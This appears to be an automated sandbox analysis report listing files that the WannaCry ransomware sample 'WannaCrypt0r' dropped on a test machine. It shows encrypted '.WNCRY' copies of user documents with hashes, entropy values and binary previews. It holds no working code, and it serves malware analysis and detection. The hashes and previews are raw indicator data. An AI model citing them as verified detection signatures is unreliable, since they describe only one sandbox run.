                                                  Preview:..I..{t4._.^.h.2P....{p\r..y.n,..b-.04...(..o...Mw..T..h.H-..Y..-.O..).."....`...>a....q..S.>..w[..R..#..4...x~hR_.gQo6..P..u.....!..cjX.<.5.a...z.M!.9L5V..Q.......`;KF."..Mc.92..+..,d.m......il..6.g.$...E3..Z.._....*.q...{[.m..:-T?j..a.....h.2...V...|m...S...w.C...8...)a-8d.......Ky...1.:....b.x.u.../o..q...L7&Ci..........a~X.^.G.....>E4T.[.y.Bp..B9....]...8...L..3) ?...jd............'....E.;....)L.X...v..K.a .>.2Fl..kfL........._H.4~w .:@MCQa.P..-...O..."#O^u..F|..91uF._]..~.......F..1.5>.A..Q.O........Qq..GH.....5...n,.-.('I...Y..pu........%......W..c.....$...4...w.Q.......\S.,9.Bk.....5.Fm!.c.......:.,.......%...B.g......v..N...v...'........Q..N......x.F.Vt6..c.,.1.../Z(nED....eQ...f...O...S..[i@.Q.n.OC.......L......vk.......c3..u.)......N....E.C..F(\.Vc.N...y.M.$..Pv.l./.f.;akgD..-....K..D.....x....]N..-.....Ok...E......w..=....A...Z@|..K>e.............@.#......&......ff.q..F.j.....>...\.4.....0T.M43..s......W.qV...sd....'.F..7....

                                                  C:\Users\user\Documents\GAOBCVIQIJ\EOWRVPQCCS.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833853175843866
                                                  Encrypted:false
                                                  SSDEEP:24:bkdlrqiVJpea7mFnljPmg1plMi9MkxnhD9QpZVJrlZGhqU5rsaNg:bkbrqAea7mlIg1Hljnhp+Vtncqosmg
                                                  MD5:8C386416994C95F9BEC9885DF42C035E
                                                  SHA1:06C888619D8BCFA2B615425B3DBEC24504332AF9
                                                  SHA-256:F9EE546D4BFBAD65F203595F2F1B63CF085580424D7E352FE8FCC01A0399206B
                                                  SHA-512:F40D42D5E09DF982E5FEDFCE83447ACE3A9FD3AF77A5E7330E0D3CCC3737A4B867FA941F79D708EB1627276A07F5E14BA91C74C9A4DE712C9F4DC17A05459C26
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R.....{i>c..0..... T.MB..^Lr......C.B.......S|..B...N.o.....?......X..nG......A<.V...mU.X..Z.zJ{F9.IT.E$.....9.f...lg.l....#.Y_..w.....&...{-s......3h..~.Fg....>.u......2..*.O.L%4...=.j......2.uB....6....:..5.|.....Fqa.G..b._#.aQ.A*...K.i6..)..............{.u..P4.U.u..'..G`n.|/>...]Z...+.U..a_.&OG...`y.@..@....AA.*.7.$..[.8.....A5...y..Z.`..)}T....vR....D-P.e.s.{.....w"..?....9....5X5.\o|..].o......U .....$.d....asdbI.."...r0...>...r_...S_5..k]v.....}.........y.!.K.b...=.-.cX.).5....$....=Y.}.^.).........^...r PDh..XAjG.......{V8..[....S...S....)..F=;....Y.5.I:.f.x.M.ad.$.o.L..k.%..Y.|...X\.I.G..D..J..0...............#7.Tvs#P..Z>.S..7..$.[.0...L.T.0) D..;...>aiX.H..x.H,..k..a#...'.7...L....."...T.N..a...".H.3g?H...K....>#c.;..W..).f...^09._.n.B.K...X......$b.3X.2=%.C..q.&!.M..,....5..3-O.v..>.d.~..~.4..T....G/...b.......s.F.0..}ig.JE.k. ...Tr.88....J$.{>`..e/...n...,`s\...~..W.;.A:_..A7.6.7...^..P...4j...h..j..M.........l^__/.K.

                                                  C:\Users\user\Documents\GAOBCVIQIJ\EOWRVPQCCS.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833853175843866
                                                  Encrypted:false
                                                  SSDEEP:24:bkdlrqiVJpea7mFnljPmg1plMi9MkxnhD9QpZVJrlZGhqU5rsaNg:bkbrqAea7mlIg1Hljnhp+Vtncqosmg
                                                  MD5:8C386416994C95F9BEC9885DF42C035E
                                                  SHA1:06C888619D8BCFA2B615425B3DBEC24504332AF9
                                                  SHA-256:F9EE546D4BFBAD65F203595F2F1B63CF085580424D7E352FE8FCC01A0399206B
                                                  SHA-512:F40D42D5E09DF982E5FEDFCE83447ACE3A9FD3AF77A5E7330E0D3CCC3737A4B867FA941F79D708EB1627276A07F5E14BA91C74C9A4DE712C9F4DC17A05459C26
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R.....{i>c..0..... T.MB..^Lr......C.B.......S|..B...N.o.....?......X..nG......A<.V...mU.X..Z.zJ{F9.IT.E$.....9.f...lg.l....#.Y_..w.....&...{-s......3h..~.Fg....>.u......2..*.O.L%4...=.j......2.uB....6....:..5.|.....Fqa.G..b._#.aQ.A*...K.i6..)..............{.u..P4.U.u..'..G`n.|/>...]Z...+.U..a_.&OG...`y.@..@....AA.*.7.$..[.8.....A5...y..Z.`..)}T....vR....D-P.e.s.{.....w"..?....9....5X5.\o|..].o......U .....$.d....asdbI.."...r0...>...r_...S_5..k]v.....}.........y.!.K.b...=.-.cX.).5....$....=Y.}.^.).........^...r PDh..XAjG.......{V8..[....S...S....)..F=;....Y.5.I:.f.x.M.ad.$.o.L..k.%..Y.|...X\.I.G..D..J..0...............#7.Tvs#P..Z>.S..7..$.[.0...L.T.0) D..;...>aiX.H..x.H,..k..a#...'.7...L....."...T.N..a...".H.3g?H...K....>#c.;..W..).f...^09._.n.B.K...X......$b.3X.2=%.C..q.&!.M..,....5..3-O.v..>.d.~..~.4..T....G/...b.......s.F.0..}ig.JE.k. ...Tr.88....J$.{>`..e/...n...,`s\...~..W.;.A:_..A7.6.7...^..P...4j...h..j..M.........l^__/.K.

                                                  C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80302777717371
                                                  Encrypted:false
                                                  SSDEEP:24:QSdrH5mbDGPBdXyJ62A3jwntZp/9X42CM1M9/e:9Z5mbDwXuA3MnnH4TM1M9/e
                                                  MD5:964053BCC473411E2E9D9F88820AF2AD
                                                  SHA1:340E5D70FDCE293A8021C9566ED23F70378B29A7
                                                  SHA-256:C292D177C2685E91B460FD0701BC26CBC53D579C2D6E7002F05116963E545EF4
                                                  SHA-512:0716967AD15CB2A4B30BB7D52F2396D4E159913D60E637ED87F05F1214AE8793C80939AB983E301BA2CDBB2EF6DD4178DBEDCC777F4AC4D8F2CE44176E686796
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...}.O-.[........`...-$....#.w..'\o..............L.-.8R}w.0@_.X..k.9.].xb.|.5.L.......D5K..C......a.t.....w....r..).?....s...f.u..6s.}J..*....#.x.0...YvK.;f\B.$...!..$...q..5.q.'..{...?xw.{...4.N...t...M...../c..8..:..`.2+.T._-...|l...t......6O.9._...=..<.%....&F]..IP...j.Ds!}.AP$8Qn....A..J..b.YLF..g..$.....[.#.?!m.....q i..p.m...............3..3..vO..|p............$.]..'.+.OQ....T.G..J.W....E..$... e_g;... He..X.2.........T.v..+.w...).hyd.}L...n..Xt...y.'My-.ps.9...y`}..Q...y....q.2.TFd..R....?<.UO..nL.`J......L......T`;k....[Y..J.;.2.(pA=.'.?....U.......{<Q.H....t\.(...B...Cm..{=....EO..'u..>.B..."...G6g....-..7....:..$...Mz:...5..r8FZm.{.r.c.....$..$.P..Y,`PQ.b..|.m.{..N`y...H.h.l."....^...g.n.4.:M...:f#[@.,.;Rl...h.....e..E,...[0y...b[.p..8.6..O....^.^....B-.C....<..Le9....)..y.......3O..,.@=^.ugb.+...-.ny........Ax..p...)...y..O..0\s.*p.._.!.91..@..7<N.vD.ff....M...w...5n..eV...m.:H.......... ....H..S..D.z.n..l.D..,.o/.B......T...".v

                                                  C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826927261370782
                                                  Encrypted:false
                                                  SSDEEP:24:bkVxqyceHP9reVPlGWVx7ZvrFAo43ahRqwGoxzc1Peu:bkVxZBcPl5j9vrFZdLJ0eu
                                                  MD5:194D446E71963BAAEEE43C2ED9985CA2
                                                  SHA1:130A8B448E079D933B1CDEE8764DB697FE645103
                                                  SHA-256:58A3E00FBA82996AB482BFC41E9866CDA0D83456E495B10CAFAE50CFF7B5DF1C
                                                  SHA-512:B76657B49772688D39610845BE8168F933319BF7B3880815E9400442EAE28CECC256942DEDC1A7CE5BEA783C9EF66CAF33DAE2F5C5272A37CB384529A922A06B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..............>|..:..ej3..jU..y.i.}.XFI....I..8XE.A.>...3W6......".........\i..2.....P.@Vl{<..!6...N.\.su3..)4.....B.b6Pb.A@r.G.@y.rq.O..e.6..j..q...+7.'|..Qj.. u.R...lt. ...........Q..3.H.U..ym.k....)d<...]...1'..u.P....c..._.tv...c.,wD.G.8.............<.Y.|..$................. ..a3.q..>.k.h.O.r.^.Q.L...g.....=....A."`...5q....S.w>A.>?...<...xP[:I......w.=.s.W..5...3...O..i..x.T.....b..$..%.L~..0......K........K.m..e/-Xe1..J......N....|5...L..X.......3e._.x..kL...(..=..Y.......$..=._N.....'.n...U...>..J.........V..[..[k.V.;5..5.9.<f..~3....Z.....7.[.....^....bb\2.082C(j...N.I0p.T.....p...;....p..F.9Fyv....[../C.+............>.....6.wg.fG.9.~.27X..}fp..NJw^.......l.R.G.IZ$.D.....'...xV....'w.|....].O[Q.0..}..%..6K:<..Z%z?J...n.[f|.....|\..:z6>.......%..........C..v.N.{]../5w.p........=i.GN.2.._...D%..s..U......6.?X..r.s'..jj...q..Q("k..c}..B.2..r...?.k.Q.D.....[.PHf.K#...B_7.t..O....C..0..g.@3"S:_i..ZK8F@..R. ..O.... D...

                                                  C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826927261370782
                                                  Encrypted:false
                                                  SSDEEP:24:bkVxqyceHP9reVPlGWVx7ZvrFAo43ahRqwGoxzc1Peu:bkVxZBcPl5j9vrFZdLJ0eu
                                                  MD5:194D446E71963BAAEEE43C2ED9985CA2
                                                  SHA1:130A8B448E079D933B1CDEE8764DB697FE645103
                                                  SHA-256:58A3E00FBA82996AB482BFC41E9866CDA0D83456E495B10CAFAE50CFF7B5DF1C
                                                  SHA-512:B76657B49772688D39610845BE8168F933319BF7B3880815E9400442EAE28CECC256942DEDC1A7CE5BEA783C9EF66CAF33DAE2F5C5272A37CB384529A922A06B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..............>|..:..ej3..jU..y.i.}.XFI....I..8XE.A.>...3W6......".........\i..2.....P.@Vl{<..!6...N.\.su3..)4.....B.b6Pb.A@r.G.@y.rq.O..e.6..j..q...+7.'|..Qj.. u.R...lt. ...........Q..3.H.U..ym.k....)d<...]...1'..u.P....c..._.tv...c.,wD.G.8.............<.Y.|..$................. ..a3.q..>.k.h.O.r.^.Q.L...g.....=....A."`...5q....S.w>A.>?...<...xP[:I......w.=.s.W..5...3...O..i..x.T.....b..$..%.L~..0......K........K.m..e/-Xe1..J......N....|5...L..X.......3e._.x..kL...(..=..Y.......$..=._N.....'.n...U...>..J.........V..[..[k.V.;5..5.9.<f..~3....Z.....7.[.....^....bb\2.082C(j...N.I0p.T.....p...;....p..F.9Fyv....[../C.+............>.....6.wg.fG.9.~.27X..}fp..NJw^.......l.R.G.IZ$.D.....'...xV....'w.|....].O[Q.0..}..%..6K:<..Z%z?J...n.[f|.....|\..:z6>.......%..........C..v.N.{]../5w.p........=i.GN.2.._...D%..s..U......6.?X..r.s'..jj...q..Q("k..c}..B.2..r...?.k.Q.D.....[.PHf.K#...B_7.t..O....C..0..g.@3"S:_i..ZK8F@..R. ..O.... D...

                                                  C:\Users\user\Documents\GAOBCVIQIJ\NVWZAPQSQL.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813001683623214
                                                  Encrypted:false
                                                  SSDEEP:12:8DnXLlPqJ+yeYbc5rH1Rbxqfx3slCVYGGcy6LDlqp4IK7GetDRg2RzrjEsX/NYwA:8D7QJbLKb9qTGclRqsGqrYCAMBTOo2
                                                  MD5:80CF306836A6F1C049996E8B35B2CEB9
                                                  SHA1:A6956BEC1B2EAC605BE8C97C9E0ABE6162AC0494
                                                  SHA-256:A783CBD3F5D1E92A9B6B7CD0ED548169082AD43B2344C86BC7C34ABC0C5DEC94
                                                  SHA-512:631FBEBA01097D533053C089B36F20A4DC43B3676FA594DD53560C32E34FEE1A6D6D021F8867EB9F76E7BC863654BABA7210C4C3F38952337615C874A380A8D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:5..../.V.....S.:.nQ....8.<[j..d...$uc.,.\.....8`.7..NAn..d......>........u...;4."....~.#.....)\^...HqN<.Z..Hui........e..........$..xQ"Na..B.:"lM:xj...b.*..q.d.m.#..qM..%d/......!l....=.U.+...U.@J@S@.>........+&...wI..-!M....V..P.....~_..<.7jvP.P*..9q.....#.H.d..3.....r.............S....@..$b._..b...Z8@.k..0...>.5....k...uZ....././B.C.6x.....H.P4...mK....3.3..0gcH+.SoW....,!(.(.. ...1Cn.p."C.f........k....\.;f;w..4d.>v..J...AF.....0...3..Z.av]F_(9.n.cm.pT:.0....22...q......./....?N>U......J...=...pJ....?=......]'?....K..S.9\...J<I}..........:...M##.G.Qa.M'..8.k.7*#.{....p\....Y.{....:kw..|.S.K./;pn.].V.|..../..?Ev..ux...R>..!.......3..:.q.*..._.P..SM.{...K..Sj.S...d..e.?..6.|.@./h`.2...\a.0-...uL197..%.R...a.+...q.}j.C%.s...^nbI[..dr......o..$......_....W.....v..Y.6....,.YtR.T..v..........v_N.N?+.-.z....C..r.z..\..g.,.dyc...NT...OG[.Ij..b..i.3UxP../..;b.<)......./Z.D....dS..sW>......_......K.w..(.3#...~"..#...x.-...Z...dR<....u....&.

                                                  C:\Users\user\Documents\GAOBCVIQIJ\NVWZAPQSQL.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.827763135430909
                                                  Encrypted:false
                                                  SSDEEP:24:bkTaZOB7oB2WAFTNvNwIrB7oIzD2OoixMEPWl:bktBTFTtRzquul
                                                  MD5:6527F2BCA238AC348A94B962BBAD72E5
                                                  SHA1:930CA73CDDC38B6D8F00ED85E7E39C10D14C3C1C
                                                  SHA-256:5C80F6B9FFB80688DDC9594F918115AC1A1813E8A6CCDF1A18A45B9218371FEE
                                                  SHA-512:3FD3AA3C716E8AF9D543F3AF7228B2224C45AF65FDC59E9C8F656814827F796EE34E31EEC575D499C592A122D9C81B35E9CEEEADDF60EA03DAD73B7E6BBFA64E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.... ......m...g#...)d.$C-Me..r..*.#_.=. .hj...tj@...._g&R....`\.......0.k..g....a.1A....(-..95....L.b...Z...t...T;.....^....K.6@n.s....$.X..^J.g...P......4rVU....$. ..'...7r.......a9......s.[.In...{...Y].m[...{E.vlZ.J...K.n..6.o.9ms,T...=.f..K....M/@............e4.t..x...)..[k.C...!CF..P.r.|..L...|.....Y...U...T..J. ..HA.....uR...)Q)x.....D.?.....(...E...mRS.\...X@L.h.:C..^z..L.."=x2`...C.'.8i.h..W.. ........~.w.ML.9.n.....ICt..R.,.......e4..=.3n.N.....aq!PB>i..s....'`..._...q;p4.z.N>...06=...T..r...:C.]..T......j{r..|.e...-F~...eo..BX.QC.....+..p..Ng......Q...S.J...Xt.B.R....G........}........o..[.J..Cc.P.c.aH...U9^GTP....:...z7..?..xg".(z/!.x.T9.r....1.wELc.....7..OV...ko..#.a ......5....LV.b.F!Q."....i.Fj.p....T.F. P..o.Z.Soe..Y.....:b&..V5.P\.=,.h.2h..X.?+......O.....Hw.U.'.\...FL...L=.'s..g._.gA.x.....=B.#....J...2.....$...W...@ ...uK=9.]6r-..<...].m..d._d/.?..}u.....;/XL.Vl......_.@..rs2..Z.q."G.Z....nJ...(.Z......~z..$~-.

                                                  C:\Users\user\Documents\GAOBCVIQIJ\NVWZAPQSQL.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.827763135430909
                                                  Encrypted:false
                                                  SSDEEP:24:bkTaZOB7oB2WAFTNvNwIrB7oIzD2OoixMEPWl:bktBTFTtRzquul
                                                  MD5:6527F2BCA238AC348A94B962BBAD72E5
                                                  SHA1:930CA73CDDC38B6D8F00ED85E7E39C10D14C3C1C
                                                  SHA-256:5C80F6B9FFB80688DDC9594F918115AC1A1813E8A6CCDF1A18A45B9218371FEE
                                                  SHA-512:3FD3AA3C716E8AF9D543F3AF7228B2224C45AF65FDC59E9C8F656814827F796EE34E31EEC575D499C592A122D9C81B35E9CEEEADDF60EA03DAD73B7E6BBFA64E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.... ......m...g#...)d.$C-Me..r..*.#_.=. .hj...tj@...._g&R....`\.......0.k..g....a.1A....(-..95....L.b...Z...t...T;.....^....K.6@n.s....$.X..^J.g...P......4rVU....$. ..'...7r.......a9......s.[.In...{...Y].m[...{E.vlZ.J...K.n..6.o.9ms,T...=.f..K....M/@............e4.t..x...)..[k.C...!CF..P.r.|..L...|.....Y...U...T..J. ..HA.....uR...)Q)x.....D.?.....(...E...mRS.\...X@L.h.:C..^z..L.."=x2`...C.'.8i.h..W.. ........~.w.ML.9.n.....ICt..R.,.......e4..=.3n.N.....aq!PB>i..s....'`..._...q;p4.z.N>...06=...T..r...:C.]..T......j{r..|.e...-F~...eo..BX.QC.....+..p..Ng......Q...S.J...Xt.B.R....G........}........o..[.J..Cc.P.c.aH...U9^GTP....:...z7..?..xg".(z/!.x.T9.r....1.wELc.....7..OV...ko..#.a ......5....LV.b.F!Q."....i.Fj.p....T.F. P..o.Z.Soe..Y.....:b&..V5.P\.=,.h.2h..X.?+......O.....Hw.U.'.\...FL...L=.'s..g._.gA.x.....=B.#....J...2.....$...W...@ ...uK=9.]6r-..<...].m..d._d/.?..}u.....;/XL.Vl......_.@..rs2..Z.q."G.Z....nJ...(.Z......~z..$~-.

                                                  C:\Users\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.793923022248367
                                                  Encrypted:false
                                                  SSDEEP:24:3BJpoI5t3M0Aw0nRn2v5dVhmx/+dXdVp6JdG+14X2P0XJU:Jpb3M0AhnxS5dV2/+dh62+ymsZU
                                                  MD5:772B750197A3F37CA8168029FCCD81C9
                                                  SHA1:FA47ABC9C69F2A4F3561912504ECDE85D9764593
                                                  SHA-256:82765F72AF9CD140FFE169E53A2E05234BBF6FCE9BBC77D98BD9D4BA5415C24E
                                                  SHA-512:D9D168E76C90778D4BA847E95D9AEF28539776F712178158B68357236A34E8598E0CDFA5BD2D3BE3F97B856726D58BB721A85E389ECAE6B58863AD5E1177E520
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:wi..5M..&..u.5.6....... .3B..gJ8...m.(.|.i..+=.....2......6r..Yi.;.* .A.....*Djh...).q..........KV..2T.7o.J..X..;yM.%L.W/Lex"gz=...F...u.mf....Fv.@.. ......r...k'.+hF^e9.-..<..o%..p...WZ.gv....hi..... .py...)h........ !.~......d......T...P.....c......?....=m.f.......h..*x.k......U,.0G..K.9.S.X?-.....b..G3..^..`..~.[j..c.9'r\L%...&.<Z..S.."..=.~....".....W.+.h......d9..a.......m. <.V..W....V....^ju....;....B....:v.0..._....1..I.&1)%.X.d.t..`s.....0L..H.........h..,..._.n.U.Gb6..dSh..`...<..D-..\......N}.l.,.Xj.%..E....m._..S*n.}du.;q.........Ed.........%6<..GT#.....5.....L=+.R...'....).P........d...\............k=*B.."..x...@.X_.1q<....`.]"..B.B..}.>...^O!M. I+.m.....7....?......!3.....R...<....*vq.?M.....^..w...4..mu..r.;......3.5....x.V'%7.y-!...v.....FnC..Y.....#..b......S9.v..F.....[..{e......W.B^.........vn)..`a.GjV.GC...l...U#..VA._.%.Fd.....,...u.....$.K...a.T.9p!..9..|..4.2..^.....8..k..$...DK.?K....q,....9.m..@d.Y........D..M.c8

                                                  C:\Users\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848765223419081
                                                  Encrypted:false
                                                  SSDEEP:24:bk+hfEsrKKC+dm4kqvXZDcr0nyF9rRcmbOpCR7Y8YF7msdR2cInKvKAnRfo:bkgssrKKCijDcrUm9rrQemDDvKefo
                                                  MD5:89D14FEE4F1886AC608D523342A71B1B
                                                  SHA1:B41891E5BC639DA165601FCAD9D139043FC02BC4
                                                  SHA-256:6FB75EBC0DDB8A4E5D6A951D9ABEDB89A91C1E7C1798ABEE8A572F5ACA6DBF88
                                                  SHA-512:B25399C537839D3B3CB84C04F8E6B3D031C1562617BF72B26E5AB0621AFDE50DAFE9730B607707A44948D85FB3891C03170DAD70669421CAA22897F377AED286
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....w.h"n...S......L.. .,..F.B.0.-j{...f[.q.....O.h...S?\....sT.R~.1.4D...W.a..N..O..d..od'./w.'.]..y:..NZ]...b;#.!..^...C.Y.(G.vw@......M.!...4....D.T....^.C...............[....0q....P.+5..c;.|..19s...f.r.{(........B.e.{.A,.N.-4..!W.+.]!.E.B.D..n...............t.WB.*...B....7.M..........0S.|.^..:.......C..`m..~.....h..W.......:...u.mm.fAT.V.!...nS....rF=.>........$....O....,V.0.Q;...w...X..P..].h....g..........G../...O.4Vi......KT...h..F.e..Mt....q.d...>.#..Z..o..*I..p...3.@.C......=.4w...dz*..L.L.'....H..j......cQr[.Vz..........To......gWT.Cz..0..s(..N.......R...`.EE.K..F.'W...V){xxy...u....$...=.&/.....o...qq<@0.f{E&o.........E..k.esAS4b.%.SK..O../..}Tt.N..a@I.T...E.8.(...d..N....b..%..>...p..k....\..-.w.7W....^Y.x...2\..."..DP(..uj*|...........6.v#{.p[-B...XRF>..Z|....CI\-.......R..5.K.yy.z.h.......WS6....&g}....t..A...0>X....a3.BS....&.Z...,..l.:.l...`...vv.%s....IN..Z...q?..7....5.v....q.gu.6(cu.p......d.O...6...t~.>..m.\|

                                                  C:\Users\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848765223419081
                                                  Encrypted:false
                                                  SSDEEP:24:bk+hfEsrKKC+dm4kqvXZDcr0nyF9rRcmbOpCR7Y8YF7msdR2cInKvKAnRfo:bkgssrKKCijDcrUm9rrQemDDvKefo
                                                  MD5:89D14FEE4F1886AC608D523342A71B1B
                                                  SHA1:B41891E5BC639DA165601FCAD9D139043FC02BC4
                                                  SHA-256:6FB75EBC0DDB8A4E5D6A951D9ABEDB89A91C1E7C1798ABEE8A572F5ACA6DBF88
                                                  SHA-512:B25399C537839D3B3CB84C04F8E6B3D031C1562617BF72B26E5AB0621AFDE50DAFE9730B607707A44948D85FB3891C03170DAD70669421CAA22897F377AED286
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....w.h"n...S......L.. .,..F.B.0.-j{...f[.q.....O.h...S?\....sT.R~.1.4D...W.a..N..O..d..od'./w.'.]..y:..NZ]...b;#.!..^...C.Y.(G.vw@......M.!...4....D.T....^.C...............[....0q....P.+5..c;.|..19s...f.r.{(........B.e.{.A,.N.-4..!W.+.]!.E.B.D..n...............t.WB.*...B....7.M..........0S.|.^..:.......C..`m..~.....h..W.......:...u.mm.fAT.V.!...nS....rF=.>........$....O....,V.0.Q;...w...X..P..].h....g..........G../...O.4Vi......KT...h..F.e..Mt....q.d...>.#..Z..o..*I..p...3.@.C......=.4w...dz*..L.L.'....H..j......cQr[.Vz..........To......gWT.Cz..0..s(..N.......R...`.EE.K..F.'W...V){xxy...u....$...=.&/.....o...qq<@0.f{E&o.........E..k.esAS4b.%.SK..O../..}Tt.N..a@I.T...E.8.(...d..N....b..%..>...p..k....\..-.w.7W....^Y.x...2\..."..DP(..uj*|...........6.v#{.p[-B...XRF>..Z|....CI\-.......R..5.K.yy.z.h.......WS6....&g}....t..A...0>X....a3.BS....&.Z...,..l.:.l...`...vv.%s....IN..Z...q?..7....5.v....q.gu.6(cu.p......d.O...6...t~.>..m.\|

                                                  C:\Users\user\Documents\LSBIHQFDVT.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823920902058649
                                                  Encrypted:false
                                                  SSDEEP:24:UWQ81IK4t8HhWioZuzNlHCLTpiP+zqi/qsL0cocJQO02Ba:UWhIDtaoYzNliLTYxaqEDJha
                                                  MD5:B8DFB1B4BC3E8B1C811AB24C19B587CA
                                                  SHA1:58B0ABCF7B827090B8D9B4B02A908C6925AEE619
                                                  SHA-256:A10E25A0F4497554CF3DCE7A94D4E9F961AE0F6BC37721EA456DBA98CFD96A2F
                                                  SHA-512:20A4D23E77B24B70F703DE429BCB06BD57F8D0E394800A46FF539CA93424A806D1EF60750767414EA465E2B79AD5C906FBDDD04182084C507AF3DFD5B88DA98A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...L5.M3..+..R..+......./.G...V.5.;qC.B....5.....U~.....'9.b:......>..b...+au$.FO3.;tyU..l.J...$.:.,M%.FH..hC.lI|N"y1..a.!.d*..@...a.....m...ZE...wShF.z...P.5W#|oH.........{A......`.8.c.F..].C.iq.bM...L...:..u@V..w/l....U....t1..igd.VZ....4.(....8...- .....>.o..........F..yV.F'...k.,g..H=C...a..O...`.I.0..>.w9. ...]1..@`....5..7.0.N.\..d.P.$7.h.o2o.{L$...N..B_......U...|.Yyn....x0;....x.H.*Se._K@....g.A.e..R.......B.1#.....x.. ......G!....V.kV.w.. .....x.)S.....h<&..x+vP......4..N.M.....].`B....r...^.V..J{.0./....>5L\[.|..E.......kt.c..m..K.YY.&.zp..n.7t..qx|!....QV..a.&2...e.^d.........j..8.j..'....`...\.c.q..\...l.r.b....b'-.c.....JX...e.)..........x.~...A*w.S.."t&!...I.v@i9*^......l.].z.,[.6.)t.....T.hAI..Z.m..y......62.....b..S...2..9..._l.k.9}....pt4.0.x...$j.....jT.-...<'..{I~J......y...q..`.R-.).s..+?..Gw...f.N..+..-"...:.....p..yd..6..2..u.)...Y\.1..h8...z....Pv.)..J.;90p..$..!.h.:...;g;./.|.;.yV........Za..I39Q.y.i.,

                                                  C:\Users\user\Documents\LSBIHQFDVT.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842508571135768
                                                  Encrypted:false
                                                  SSDEEP:24:bky42JTv31rDwZ4gTqlonWl3HT3xDF/fISm8uyQwvbCKDWGD1N3BZF2tF6B/87qA:bkCv1fQ4gGGwz3b/fIPyQwXvB2n4JW
                                                  MD5:28108D8BA5DD270EB65D9DC6CBF25443
                                                  SHA1:D6C468CB66562457994D11B05398971EE4ADED60
                                                  SHA-256:396342E5AC2ADF598F926817D2E14AD1833EE1CAA3E117543877778E001B5752
                                                  SHA-512:54390B392D8D430554132772CA1C8C0EF54F0820DCBD45B1618E117E9513A618E28399D0C5EAE7BC44D7C563F6E2F63B1D7E8FDAE218FE7D77DCEDDD0DA35944
                                                  Malicious:false
                                                  Reputation:unknown
